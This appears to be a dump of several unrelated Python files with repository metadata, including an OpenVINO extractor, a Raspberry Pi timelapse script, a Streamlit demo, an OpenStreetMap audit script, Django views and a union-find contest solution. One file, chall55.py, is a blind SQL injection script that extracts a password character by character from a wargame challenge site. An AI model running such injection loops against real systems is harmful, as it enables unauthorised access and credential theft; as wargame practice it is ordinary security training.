ga.saveimage(image,saveimage_name=name, saveimage_root=datadir)
| [
"[email protected]"
] | |
f340ae17ed7dee7981490e76342aa9850c34df1d | 5b832a08d8967d8d82f44f1d494b9d3474d68a4c | /chall55.py | fca83463b9c140f7fbe01fef90ed179f4a155d6c | [] | no_license | webhacking/webhacking.kr | 7cce9425316bb462f0d87d71b14302f3a1e8b0e3 | 3e540003cbaf33e5620bee532f71a3722ecd7cfa | refs/heads/master | 2021-01-01T04:28:59.077842 | 2015-06-13T08:44:08 | 2015-06-13T08:44:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 767 | py | import requests
url='http://webhacking.kr/challenge/web/web-31/rank.php?score=1%09or%091%09and%09right(left(pAsSw0RdzzzZ,'
param='),1)='
cookies={'PHPSESSID':'v8vr9tl8nj5ic89us02rjcgua2'}
#print requests.get('http://webhacking.kr/challenge/web/web-31/rank.php?score=1%09or%091%09and%09right(left(pAsSw0RdzzzZ,1),1)=0x63',cookies=cookies).text #true localhost in
#raw_input()
#resp = requests.get(url, cookies=cookies)
key=''
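# Boolean-based blind SQL injection: recover the password one character at a time
# by testing ASCII codes; the word 'localhost' in the response marks a TRUE guess.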
for count in xrange(1,21):
for i in xrange(0x20,0x80): # ascii
url1 = url + str(count) + param + str(hex(i))
print url1
resp = requests.get(url1, cookies=cookies)
if 'localhost' in resp.text:
key=key+chr(i)
print "find it! " + key
break
print key
#print resp.text
| [
"[email protected]"
] | |
10a98cde3457743f33c29b120825b0bd0c19af31 | 2ae0b8d95d439ccfd55ea7933ad4a2994ad0f6c5 | /tools/mo/openvino/tools/mo/front/onnx/gathernd_ext.py | b638ad0cc4d29c517ebaa0ba1bf96d72f56e7752 | [
"Apache-2.0"
] | permissive | openvinotoolkit/openvino | 38ea745a247887a4e14580dbc9fc68005e2149f9 | e4bed7a31c9f00d8afbfcabee3f64f55496ae56a | refs/heads/master | 2023-08-18T03:47:44.572979 | 2023-08-17T21:24:59 | 2023-08-17T21:24:59 | 153,097,643 | 3,953 | 1,492 | Apache-2.0 | 2023-09-14T21:42:24 | 2018-10-15T10:54:40 | C++ | UTF-8 | Python | false | false | 575 | py | # Copyright (C) 2018-2023 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
from openvino.tools.mo.ops.gathernd import GatherND
from openvino.tools.mo.front.extractor import FrontExtractorOp
from openvino.tools.mo.front.onnx.extractors.utils import onnx_attr
class GatherNDFrontExtractor(FrontExtractorOp):
op = 'GatherND'
enabled = True
@classmethod
def extract(cls, node):
attrs = {
'batch_dims': onnx_attr(node, 'batch_dims', 'i', default=0)
}
GatherND.update_node_stat(node, attrs)
return cls.enabled
| [
"[email protected]"
] | |
113d8826277c464d78f5df2901a3616ed0be649c | 307089d509d2b72ac036b7fcc5bd60f5759cca6f | /opencv/timelapse-usb.py | 5796e4b04d7171718fe2ddbaca9b0b4efb04bce1 | [] | no_license | bluemooninc/campi | 45a7bf480d6c507a20f132c64ed8315776ccacbb | 7614e2847e12442c1900281662b7bac587a9ee46 | refs/heads/master | 2020-04-06T13:12:41.184245 | 2016-09-06T14:40:03 | 2016-09-06T14:40:03 | 52,285,836 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,127 | py | import cv2
import numpy as np
import time
import datetime
import logging
import scp
import ConfigParser
import os.path
import os
import socket
import glob
import re
import lcd
##
## config
##
inifile = ConfigParser.SafeConfigParser()
inifile.read("/home/pi/camlaps.ini")
serialno = inifile.get("user","serialno")
frameWidth = inifile.getint("camera","frameWidth")
frameHeight = inifile.getint("camera","frameHeight")
delay = inifile.getint("camera","delay")
shottime = inifile.getint("camera","shottime")
## get ip address
gw = os.popen("ip -4 route show default").read().split()
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect((gw[2], 0))
ipaddr = s.getsockname()[0]
LOG_FILENAME = '/var/log/timelapse.log'
logging.basicConfig(filename=LOG_FILENAME,level=logging.DEBUG)
logging.debug(cv2.__version__)
logging.debug('timelapse start...')
# initialize the camera and grab a reference to the raw camera capture
print frameWidth
print frameHeight
location = (0,30)
fontscale = 2.0
fontface = cv2.FONT_HERSHEY_PLAIN
color = (255,190,0)
dt = datetime.datetime.today()
seekfile = '/home/pi/picture/img%02d-*.jpg' % dt.hour
newestCount = 0
##
## capture start
##
# capture frames from the camera
count = 0
cap = cv2.VideoCapture(0)
cap.set(3,frameWidth)
cap.set(4,frameHeight)
if not cap.isOpened():
    print "Could not open camera"
    sys.exit()
time.sleep(1)
while(cap.isOpened()):
# grab the raw NumPy array representing the image, then initialize the timestamp
# and occupied/unoccupied text
ret, img = cap.read()
print count
now = datetime.datetime.now()
msg = now.strftime("%Y/%m/%d %H:%M:%S")
cv2.putText(img,msg,location,fontface,fontscale,color,4)
fname = "img%02d-%04d.jpg" % (dt.hour,count,)
fpath = "/home/pi/picture/" + fname
#logging.debug("debug:"+fname)
if os.path.exists(fpath):
os.remove(fpath)
print fname + msg
cv2.imwrite(fpath, img)
lcd.printLcd("Shot:%04d/%04d, IP:%s" % (count,shottime,ipaddr))
if count < newestCount+shottime:
time.sleep(delay)
count+=1
else:
break
##
## finish
##
lcd.printIP()
| [
"root@raspberrypi.(none)"
] | root@raspberrypi.(none) |
51ebb937c14abbd238fc78b2b7209d12b00a2742 | 3abb791b043178ee56c46288eed930a435194cff | /streamlit_test_main.py | a6a070812e8d933b73ad986d0323596b88524240 | [] | no_license | masatoraogata369/streamlit_test | b8a0d1577b9df9c8d38c7b8377ea9e0d0724d0b6 | 5e5e9e46dd595a48755bd5dceaf30435dac96d36 | refs/heads/master | 2023-04-15T01:32:14.888087 | 2021-04-28T23:33:44 | 2021-04-28T23:33:44 | 362,457,137 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,011 | py | """
Try out streamlit: you can build data-visualization and analysis apps very quickly.
**Notes
Since this is a conda environment, install it with conda install
Supports Markdown formatting (Markdown: a simple markup language);
the number of # signs sets the heading level, and backquotes create code blocks
You can also create interactive widgets
"""
import streamlit as st
import numpy as np
import pandas as pd
#import time
from PIL import Image
st.title("Streamlit 入門")
st.write("display DataFrame")
# handling for columns
left_columns, right_columns = st.beta_columns(2)
button1 = left_columns.button("右カラムに文字を表示")
button2 = left_columns.button("表示をリセット")
if button1:
right_columns.write("ここは右カラムです")
if button2:
pass
df = pd.DataFrame(
np.random.rand(100,2)/[50,50] + [34.7338219,135.5014056],
columns=['lat','lon']
)
img = Image.open("IMG_7282.JPG")
# use dataframe to display a dynamic table
if st.checkbox("show dataframe"):
st.dataframe(df,width = 400,height = 200)
# line chart
#st.line_chart(df)
# area chart
#st.area_chart(df)
# bar chart
#st.bar_chart(df)
# map display
if st.checkbox("show maps"):
"""
## 新大阪付近
### ランダムに緯度経度をプロット
"""
st.map(df)
if st.checkbox("show image"):
st.write("Display images, good views")
st.image(img, caption='good view',use_column_width=True)
st.sidebar.write('interactive widgets')
text = st.sidebar.text_input(
"趣味は?"
)
option = st.sidebar.selectbox(
"好きな数字を教えてください",
list(range(1,10))
)
"あなたの好きな数字は",option,"ですよん"
"あなたの趣味は",text,"ですよん"
#expander
expander = st.beta_expander("問い合わせ先")
expander.write("please mail me xxx")
| [
"[email protected]"
] | |
7d914fe69c7e5bff93630dbda1b39b6086d3bc58 | 4c7d74c860c763e8f53eed5ad9bacced58ca253e | /p4/audit.py | c6a63d59a4a31ba6ecc4d27882d68b69468a5685 | [] | no_license | djlee11/udacity-dand | e2261a37090da64e3254de23f7ad0dd041be7536 | 3faa4fb64d3223bdd8650e176fcd317249ec9799 | refs/heads/master | 2021-10-09T21:46:13.855480 | 2019-01-03T19:06:40 | 2019-01-03T19:06:40 | 106,338,887 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,612 | py | import xml.etree.cElementTree as ET
from pprint import pformat
import pprint
import re
from collections import defaultdict
osmfile = './input/sample.osm'
street_type_re = re.compile(r'\b\S+\.?$', re.IGNORECASE)
num_type_re = re.compile(r'\b[0-9][0-9][0-9]$|\b[0-9][0-9]$')
lowercase_re = re.compile(r'\b[a-z]+\b')
capitalize_re = re.compile(r'\b[A-Z]+\b')
postal_re = re.compile(r'\D+')
county_re = re.compile(r'[\:]|[\;]')
expected = ["Street", "Avenue", "Boulevard", "Drive", "Court", "Place", "Lane", "Road",
"Trail", "Parkway", "Ridge", "Way", "Pass", "Creek", "Chase", "Crossing",
"Terrace", "Point", "Path", "Loop", "Run", "Cove", 'Bend', 'Circle', 'Trace', 'Walk',
"Southeast", "Southwest", "Square", "Northeast", "Northwest", "View", "Landing", "North","East",
"South", "West"]
def audit_street_type(street_types, street_name):
m = street_type_re.search(street_name)
if m:
street_type = m.group()
if street_type not in expected:
street_types[street_type].add(street_name)
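def is_street_name(elem):
    # minimal helper assumed by audit() below: treats OSM 'addr:street' tags as street names
    return elem.attrib['k'] == "addr:street"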
def audit(osmfile):
osm_file = open(osmfile, 'r')
street_types = defaultdict(set)
    for event, elem in ET.iterparse(osm_file, events=("start",)):
if elem.tag == 'node' or elem.tag == 'way':
for tag in elem.iter('tag'):
if is_street_name(tag):
audit_street_type(street_types, tag.attrib['v'])
osm_file.close()
def update_street(name, street_issue):
"""
Takes in street suffix and determines if it is an expected suffix.
If not, function checks whether suffix is an abbreviation issue (from mapping) and corrects it if true.
Also checks to make sure no lowercase issues.
"""
    mapping = { "St": "Street",
                    "St.": "Street",
                    "Blvd": "Boulevard",
                    "Blvd.": "Boulevard",
                    "Ave": "Avenue",
                    "Ave.": "Avenue",
                    "Rd.": "Road",
"Dr" : "Drive",
"Dr.": "Drive",
"Trl": "Trail",
"Rd" : "Road",
"Ln" : "Lane",
"Cir": "Circle",
"Ct" : "Court",
"Hwy": "Highway",
"Trce": "Trace",
"Pkwy": "Parkway",
"Pl": "Place",
"Xing": "Crossing",
"Ter": "Terrace",
"Mhp": "Mobile Home Park",
"Crst": "Crest",
"Lndg": "Landing",
"Pt": "Point",
"S": "South",
"S.": "South",
"W": "West",
"W.": "West",
"N": "North",
"N.": "North",
"E": "East",
"E.": "East",
"NE": "Northeast",
"NW": "Northwest",
"SE": "Southeast",
"SW": "Southwest",
"Hts": "Heights",
"Rte": "Route"}
nn = street_type_re.search(name)
ll = lowercase_re.search(name)
cc = capitalize_re.search(name)
if nn:
street_type = nn.group()
if street_type not in expected:
if street_type in mapping:
name = re.sub(street_type_re, mapping[street_type], name)
elif ll or cc:
name = name.title()
return name
else:
street_issue[street_type] += 1
return name
return name
def update_phone(n):
""" Formatting phone numbers to ###-###-#### """
match = re.match(re.compile(r'\d{3}\-\d{3}\-\d{4}'),n)
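    # Illustrative examples (assumed inputs) of the normalisation below:
    #   '+1 (404) 555-1234' -> '404-555-1234'
    #   '404 555 1234'      -> '404-555-1234'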
if match is None:
n = re.sub('\+1', '', n)
n = re.sub(' ', '', n)
if "(" in n or ")" in n:
n = re.sub('[(]',"", n)
n = re.sub('[)]','-',n)
n = re.sub(' ', '', n)
if "+1" in n:
n = re.sub('\+1','',n)
if re.match(re.compile(r'\-\d{3}\-\d{3}\-\d{4}'),n) is not None:
n = n[1:]
if re.match(re.compile(r'\d{1}\-\d{3}\-\d{3}\-\d{4}'),n) is not None:
n = n[2:]
if re.match(re.compile(r'\d{9}'),n):
n = n[:3] + '-' + n[3:6] + '-' + n[6:]
if re.match(re.compile(r'\d{6}\-\d{4}'),n):
n = n[:3] + '-' + n[3:]
return n
def update_county(name):
"""
Using regex to determine whether particular string has more than one county (separated by : or ;).
If true, first county enlisted will be returned. If first county is from AL, we replace it with
'Fulton, GA'.
"""
if county_re.search(name):
if ":" in name:
name = name.split(':')[0]
elif ";" in name:
name = name.split(';')[0]
if "AL" in name:
name = "Fulton, GA"
print name
return name
def update_postal(name):
"""Return first five digits of postal code"""
if postal_re.search(name):
return name[:5]
return name
| [
"[email protected]"
] | |
8a7738f0d32537b2f0994883b51fa8ae1b0e8c30 | f9d564f1aa83eca45872dab7fbaa26dd48210d08 | /huaweicloud-sdk-hilens/huaweicloudsdkhilens/v3/model/delete_secret_response.py | aa4df97a980ce2ea5cf944f3cadf638e76878e29 | [
"Apache-2.0"
] | permissive | huaweicloud/huaweicloud-sdk-python-v3 | cde6d849ce5b1de05ac5ebfd6153f27803837d84 | f69344c1dadb79067746ddf9bfde4bddc18d5ecf | refs/heads/master | 2023-09-01T19:29:43.013318 | 2023-08-31T08:28:59 | 2023-08-31T08:28:59 | 262,207,814 | 103 | 44 | NOASSERTION | 2023-06-22T14:50:48 | 2020-05-08T02:28:43 | Python | UTF-8 | Python | false | false | 3,211 | py | # coding: utf-8
import six
from huaweicloudsdkcore.sdk_response import SdkResponse
from huaweicloudsdkcore.utils.http_utils import sanitize_for_serialization
class DeleteSecretResponse(SdkResponse):
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
'secret': 'SecretId'
}
attribute_map = {
'secret': 'secret'
}
def __init__(self, secret=None):
"""DeleteSecretResponse
The model defined in huaweicloud sdk
:param secret:
:type secret: :class:`huaweicloudsdkhilens.v3.SecretId`
"""
super(DeleteSecretResponse, self).__init__()
self._secret = None
self.discriminator = None
if secret is not None:
self.secret = secret
@property
def secret(self):
"""Gets the secret of this DeleteSecretResponse.
:return: The secret of this DeleteSecretResponse.
:rtype: :class:`huaweicloudsdkhilens.v3.SecretId`
"""
return self._secret
@secret.setter
def secret(self, secret):
"""Sets the secret of this DeleteSecretResponse.
:param secret: The secret of this DeleteSecretResponse.
:type secret: :class:`huaweicloudsdkhilens.v3.SecretId`
"""
self._secret = secret
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
import simplejson as json
if six.PY2:
import sys
reload(sys)
sys.setdefaultencoding("utf-8")
return json.dumps(sanitize_for_serialization(self), ensure_ascii=False)
def __repr__(self):
"""For `print`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, DeleteSecretResponse):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| [
"[email protected]"
] | |
8503376b74b2a923b8e2a3000559857a39e7f56c | f79ad09628384296750132040c008c8c6f3a24b2 | /Kotomi/Kotomi/blog/views.py | 39d9303308c92fed4a6517015a321d8a465ce0e9 | [
"Apache-2.0"
] | permissive | 1tuanyu/Django | 4cd671ab2cb0cc7394431f470a29f6061388e9f4 | 466b4b4b1a5b3b81c3315fd26e8dfa8ddad7d272 | refs/heads/master | 2021-01-24T21:12:35.910075 | 2018-03-29T12:21:44 | 2018-03-29T12:21:44 | 123,267,727 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,201 | py | from django.shortcuts import render
from blog.models import Article
# Create your views here.
def Home(request):
articles = Article.objects.all()
return render(request, 'home.html', {'articles':articles})
def Post(request):
return render(request, 'post.html')
def Post_success(request):
if request.POST:
articles = request.POST['new_title']
return render(request, 'post_success.html',{'articles':articles} )
else:
return render(request, 'error.html')
"""
, new_title, new_label, new_content
titles = [article.title for article in Article.objects.all()]
new_title = request.POST['new_title']
if new_title in titles:
return render(request, 'error.html', {'error_message':'This article is already exist!'})
else:
new_article = Article(title=new_title, pub_date=timezone.now(), label=new_label, content=new_content)
new_article.save()
def Post_success(request):
if request.POST['new_content']:
post_success = request.POST['new_content']
return render(request, 'error.html')
else:
return render(reuqest, 'error.html')
"""
| [
"[email protected]"
] | |
3a51ca22b295a333d9652b5110a5ba537c2e0b23 | ff1bc2cf1cd042201df0a11da62b38725af55bfb | /setup.py | 1d2392e1304ab5e3c0320a0aff81a1543c3e8308 | [
"MIT"
] | permissive | darkbarker/pybarker | a425181149d79436c92b4ded6e3dbfc3b5934c32 | e04c79cab6ca6005761391f0bd267b8e69aed7ea | refs/heads/master | 2023-08-20T19:19:57.424908 | 2023-08-14T20:11:03 | 2023-08-14T20:11:03 | 190,403,537 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 346 | py | from setuptools import setup, find_packages
from os.path import join, dirname
import pybarker
setup(
name="pybarker",
version=pybarker.__version__,
packages=find_packages(exclude=["tests"]),
include_package_data=True,
long_description=open(join(dirname(__file__), "README.md")).read(),
install_requires=["unidecode"],
)
| [
"[email protected]"
] | |
f0726feaad28d68f162f4eb3e242c62833307ecb | cdb186ad49bba1406c81f634b936e73f8cb04009 | /ABC/120/d2.py | 59601ef036cf61ce1bab54e68b795dbf3a972c45 | [] | no_license | ToshikiShimizu/AtCoder | 9e46f5581f2c1f5149ce1394d61d652cda6256a3 | 41fe6408c20c59bbf1b5d7ee9db2e132f48ad1ac | refs/heads/master | 2023-07-26T22:45:51.965088 | 2023-07-10T14:11:35 | 2023-07-10T14:11:35 | 148,154,815 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,617 | py | class UnionFind:
def __init__(self, n):
self.nodes = n
self.parents = [i for i in range(n)]
self.sizes = [1] * n
self.rank = [0] * n
    def find(self, i):  # which set the node belongs to (index of the root node)
if self.parents[i] == i:
return i
else:
            self.parents[i] = self.find(self.parents[i])  # path compression
return self.parents[i]
    def unite(self, i, j):  # merge two sets
pi = self.find(i)
pj = self.find(j)
if pi != pj:
if self.rank[pi] < self.rank[pj]:
self.sizes[pj] += self.sizes[pi]
self.parents[pi] = pj
else:
self.sizes[pi] += self.sizes[pj]
self.parents[pj] = pi
if self.rank[pi] == self.rank[pj]:
self.rank[pi] += 1
    def same(self, i, j):  # check whether i and j belong to the same set
return self.find(i)==self.find(j)
    def get_parents(self):  # get the list of root nodes
        for n in range(self.nodes):  # path-compress every node via find
self.find(n)
return self.parents
def size(self, i):
p = self.find(i)
return self.sizes[p]
N, M = map(int, input().split())
AB = []
B = []
for m in range(M):
a, b = map(int, input().split())
AB.append((a-1,b-1))
ans = []
score = N * (N-1) // 2
uf = UnionFind(N)
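# Offline trick: process the edge removals in reverse order, so each step becomes
# an edge *addition* handled with union-find. The inconvenience starts at
# N*(N-1)/2 (every pair disconnected) and merging components of sizes s1 and s2
# reduces it by s1*s2.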
for a, b in AB[::-1]:
ans.append(score)
if not uf.same(a,b):
score -= uf.size(a) * uf.size(b)
uf.unite(a,b)
for score in ans[::-1]:
print(score)
| [
"[email protected]"
] | |
4f82550e771ed9f4ab7424687d1833c1afbf8e2e | 7e61a8a6724ab1f6fe2cf8ec896faa7c9c56866a | /precision_tool/lib/pt_dump.py | 155bd8c516519a714a4df3690457ba38c94b0d71 | [
"Apache-2.0"
] | permissive | BruceDai003/tools | 66f91972c2deb547bbeb8220735647efcb224a90 | 332f112457e61b235e7cc4bc1e156dbe14456c3c | refs/heads/master | 2023-08-22T23:34:51.359807 | 2021-10-29T01:58:56 | 2021-10-29T01:58:56 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 417 | py | # coding=utf-8
import os
import re
import time
import sys
from lib.util import util
from lib.constant import Constant
import config as cfg
from lib.precision_tool_exception import catch_tool_exception
from lib.precision_tool_exception import PrecisionToolException
class PTDump(object):
def __init__(self):
self.log = util.get_log()
# self.h5_util =
def prepare(self):
print("test") | [
"derek@derek-HP-EliteBook-840-G5"
] | derek@derek-HP-EliteBook-840-G5 |
5f85a771ec230122fb965c210478c90c309f52ed | 5d392d98549b0e0968510c9f23cc0ea3319d7e8a | /webapp/handlers/councilMemberHandler.py | c1b7560dce26c997c0abfe18513be0e83c8cddad | [] | no_license | jimclouse/MosaicRx | 27b9fc510cc146e2b7a56500da31f67fb79649c4 | c4165494a801f7c0ae045e0cef6ab6ac3c20c6df | refs/heads/master | 2020-12-24T15:14:33.109075 | 2014-12-04T16:07:13 | 2014-12-04T16:07:13 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 316 | py | #! python
import tornado.web
from partyHandler import PartyHandler
from webservice import graphService
class CouncilMemberHandler(PartyHandler):
@tornado.web.asynchronous
def get(self, councilMemberId):
partyId = graphService.getPartyId('cm', councilMemberId)
PartyHandler.get(self, partyId) | [
"[email protected]"
] | |
fe4b088965733c8cd6566d2b0f2c4b92ba22e423 | 1aa0ec8b98e66adc191627a3fbbed3aa28c67da9 | /app/reduce-count-quarter-q2/route.py | 60423bf257de638f27f06d90be8ee1d7154423af | [] | no_license | sfenman/openfass-new-york-taxi | bd51a32cd5ca84516f63163cc310a4a8fbe26b54 | e517328371a586a475c11c452e3af4f5b5dd4b06 | refs/heads/master | 2023-03-14T21:43:18.496034 | 2021-03-26T23:25:11 | 2021-03-26T23:25:11 | 345,122,872 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,089 | py | class Route:
def __init__(self, route_id, vendor_id, pickup_datetime, drop_off_datetime,
passenger_count, pickup_longitude, pickup_latitude,
drop_off_longitude, drop_off_latitude, store_and_fwd_flag):
self.route_id = route_id
self.vendor_id = vendor_id
self.pickup_datetime = pickup_datetime
self.drop_off_datetime = drop_off_datetime
self.passenger_count = passenger_count
self.pickup_longitude = pickup_longitude
self.pickup_latitude = pickup_latitude
self.drop_off_longitude = drop_off_longitude
self.drop_off_latitude = drop_off_latitude
self.store_and_fwd_flag = store_and_fwd_flag
def __eq__(self, o: object) -> bool:
return self.__class__ == o.__class__ and self.route_id == o.route_id
def __ne__(self, o: object) -> bool:
return self.__class__ != o.__class__ or self.route_id != o.route_id
def __hash__(self) -> int:
return hash(self.route_id)
def __str__(self) -> str:
return 'route id: ' + str(self.route_id)
| [
"[email protected]"
] | |
54a7dd065083236b7cf6bdf9d3d0e9405dab0f29 | 1c3f4acfdedd139ee7b05093fd26a8becc6c1cd8 | /CURSO DE PYTHON 3/Mundo 1 - Fundamentos/3 - Usando módulos do Python/Exerc017.py | d9df3c45b9e8f8ac53ec6e58a3f12109a224efb4 | [] | no_license | thiagosousadasilva/Curso-em-Video | 7d358384e03b9289bf62c90d2268e0654fbae9a7 | 2419797fcd688dcb78ca110ed18e06daec3bbcc4 | refs/heads/master | 2023-03-01T06:21:35.855862 | 2021-01-27T11:50:37 | 2021-01-27T11:50:37 | 258,023,767 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 473 | py | # Faça um programa que leia o comprimento do cateto oposto e do cateto adjacente de um
# triângulo retângulo. Calcule e mostre o comprimento da hipotenusa.
# h² = Co² + Ca² - ou usar pronto no modúlo math
import math
print("=========== desafio 017 ============")
CatOp = float(input('Informe o comprimento do cateto oposto: '))
CatAd = float(input('informe o comprimento do cateto adjacente: '))
Hip = math.hypot(CatOp, CatAd)
print('A hipotenusa é {}'.format(Hip)) | [
"[email protected]"
] | |
5a1bb3ebb5d23d720a4240471f0ea019787bdee9 | 984a797d9f81dd8d60a4d9f0861d1e8a88581026 | /PY/Week 3/CLASS/fibonacci.py | ab556c0f9174deb2b4cba1bba532f80617811d1a | [] | no_license | Yazurai/ELTE-IK-19-20 | 69e6c39b609886cce66155aaaadd0aaeb0415440 | 46fe1699885577d7fd7ffe06b3969ef34dd7e6d5 | refs/heads/master | 2020-07-23T02:19:08.724761 | 2019-12-17T10:23:10 | 2019-12-17T10:23:10 | 207,415,313 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 123 | py | def fibonacci(n):
fibList = [1,1]
for i in range(2, n, 1):
fibList.append(fibList[i-2] + fibList[i-1])
return fibList
| [
"[email protected]"
] | |
f4be12af244d26d05589402a082c127df231e385 | f9549f2657202068d331d81b519a51ed7c3f3776 | /0x06-python-classes/6-square.py | 44b00c18e9ba0d4007b99e94d994b9a4f2d74312 | [] | no_license | BardoftheOzarks/holbertonschool-higher_level_programming | 0e54774bd2581137cb58e116ac7e2985967ccd60 | 191484674583d084b15129a38788e82d4869c555 | refs/heads/master | 2023-04-20T01:01:50.221645 | 2021-05-13T21:20:32 | 2021-05-13T21:20:32 | 291,762,175 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,840 | py | #!/usr/bin/python3
'''Creates a class with two attributes'''
class Square:
'''A class with two private instance attributes'''
def __init__(self, size=0, position=(0, 0)):
if type(size) is not int:
raise TypeError('size must be an integer')
if size < 0:
raise ValueError('size must be >= 0')
        if type(position) is not tuple or len(position) != 2\
or type(position[0]) is not int or type(position[1]) is not int\
or position[0] < 0 or position[1] < 0:
raise TypeError('position must be a tuple of 2 positive integers')
self.__size = size
self.__position = position
@property
def position(self):
return self.__position
@property
def size(self):
return self.__size
def area(self):
return self.__size**2
def my_print(self):
        if self.__size == 0:
print()
else:
for o in range(self.__position[1]):
print()
for i in range(self.__size):
for spaces in range(self.__position[0]):
print(' ', end='')
for hashes in range(self.__size):
print('#', end='')
print()
@size.setter
def size(self, value):
if type(value) is not int:
raise TypeError('size must be an integer')
if value < 0:
raise ValueError('size must be >= 0')
self.__size = value
@position.setter
def position(self, value):
        if type(value) is not tuple or len(value) != 2\
or type(value[0]) is not int or type(value[1]) is not int\
or value[0] < 0 or value[1] < 0:
raise TypeError('position must be a tuple of 2 positive integers')
self.__position = value
| [
"[email protected]"
] | |
b6c4e6243f7aed9aeb62bb560838ff5c8daa92fe | 94b9589d8eb357f784f425051ffb10aa6d2104fa | /lib/doconce/__init__.p.py | cb305805b347a221aa72ac2fccf05f1fe1447c5c | [
"BSD-3-Clause"
] | permissive | sjsrey/doconce | 29607366756a3f48568a128a88c9bb5d65dc3d9d | 7bd32f8b0c99ad6f1173df0c8e058ea1bd400e28 | refs/heads/master | 2021-01-15T17:55:48.436706 | 2015-08-25T09:30:19 | 2015-08-25T09:30:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 257 | py | '''
# #include "docstrings/docstring.dst.txt"
'''
__version__ = '1.0.3'
version = __version__
__author__ = 'Hans Petter Langtangen', 'Johannes H. Ring'
author = __author__
__acknowledgments__ = ''
from doconce import doconce_format, DocOnceSyntaxError
| [
"[email protected]"
] | |
5c1ae67adb38e75d56a6b033979191ccaf1b9c4c | 06a26410235304ca3061f2abf861ceef3eef6c22 | /tools/BUILD | 8ca73d1470ef71b2fb4ba46f3bc7997dcc8e7d46 | [
"Apache-2.0"
] | permissive | mjbots/rules_mbed | d36354388661f5b1eaed3b88daf3fe201d4ab29c | 4a7094b9082625de3b979eae7f5df705cf110695 | refs/heads/master | 2023-01-13T21:56:15.464329 | 2023-01-09T12:47:59 | 2023-01-09T12:47:59 | 157,472,176 | 21 | 6 | null | null | null | null | UTF-8 | Python | false | false | 830 | # -*- python -*-
# Copyright 2018 Josh Pieper, [email protected].
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
package(default_visibility = ["//visibility:public"])
environment(name = "k8")
environment(name = "stm32f4")
environment_group(
name = "cpus",
environments = [":k8", ":stm32f4"],
defaults = [":stm32f4"],
)
| [
"[email protected]"
] | ||
5f102bdaa532902c1a9f811afa1e6ef43103f512 | 9381f6e3c6e13295467726ced5e6e4a8b3dedc45 | /api/follow.py | 575b6114cb170c195dfd90306b6d089122052f2d | [] | no_license | ayushi0407/twitterback | 7043a8053c7eca5807e081413369935420943b39 | 566dff5d068a86ae556b59b7e101178cc38a9d2c | refs/heads/master | 2022-12-16T11:40:46.470416 | 2020-09-12T10:10:19 | 2020-09-12T10:10:19 | 294,917,818 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,271 | py | from django.shortcuts import render
from django.http import HttpResponse, JsonResponse
from rest_framework import permissions
from rest_framework.response import Response
from rest_framework.views import APIView
from rest_framework.decorators import api_view, permission_classes
from rest_framework.permissions import IsAuthenticated
from django.contrib.auth.models import User
from django.contrib.auth import login, authenticate,logout
from rest_framework.authtoken.models import Token
import json
from datetime import datetime
from django.utils import timezone
from .models import *
import math
import random
import pytz
import requests
import re
from django.forms.models import model_to_dict
from django.views import View
from django.views.decorators.csrf import csrf_exempt
import os
from django.contrib.auth import get_user_model
User = get_user_model()
class follow(APIView):
@csrf_exempt
def dispatch(self, request, *args, **kwargs):
return super(follow, self).dispatch(request, *args, **kwargs)
# @permission_classes((IsAuthenticated, ))
def post(self, request):
user_by = ""
user_to = ""
check_user_to = ""
check_user_by = ""
try:
b = request.body
body_json = json.loads(b)
user_by = body_json['user_by']
user_to = body_json['user_to']
except Exception as ex:
return JsonResponse({'status':'fail','message':'Something went wrong'})
try:
check_user_to = AuthUser.objects.get(email=user_to).id
check_user_by = AuthUser.objects.get(email=user_by).id
check_follow = Follower.objects.filter(user_to=check_user_to ,user_by=check_user_by).exists()
if check_follow:
Follower.objects.filter(user_to=check_user_to ,user_by=check_user_by).delete()
return JsonResponse({'status':'success','message':'Unfollowed'})
else:
Follower.objects.create(user_to=check_user_to ,user_by=check_user_by)
return JsonResponse({'status':'success','message':'followed'})
except Exception as ex:
return JsonResponse({'status':'fail','message':'Something went wrong'})
| [
"[email protected]"
] | |
